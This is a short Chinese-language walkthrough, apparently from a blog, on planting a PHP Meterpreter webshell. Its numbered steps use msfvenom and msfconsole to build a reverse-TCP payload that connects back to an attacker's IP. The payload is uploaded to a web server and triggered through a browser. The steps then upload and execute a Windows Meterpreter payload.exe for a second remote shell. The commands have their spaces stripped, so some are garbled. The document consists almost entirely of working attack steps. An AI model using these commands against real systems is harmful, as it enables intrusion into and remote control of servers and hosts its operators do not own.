php Meterpreter Webshell

1.msfvenom-pphp/meterpreter/reverse_tcpLHOST=Attacker's_IPLPORT=443T>./a.php

2.上传a.php到web服务器

3.启动msfconsole

4.usemulti/handler

5.setLHOSTAttacker's_IP

6.setLPORT443

7.setpayloadphp/meterpreter/reverse_tcp

8.exploit

9.攻击者使用浏览器访问上传的文件

10.此时,攻击者可以得到一个meterpretersession

11.打开一个终端,然后再创建一个payload

msfpayloadwindows/meterpreter/reverse_tcpLHOST=Attacker's_IPLPORT=4444

X>payload.exe

12.在session中使用upload命令将payload.exe上传

13.然后在第二个终端中运行msfconsole,设置multi/handler,paylaod为'windows/meterpreter/reverse_tcp

14.在第一个终端中运行execute-fpayload.exe

这时可以在第二个终端中获得一个meterpretersession

相关推荐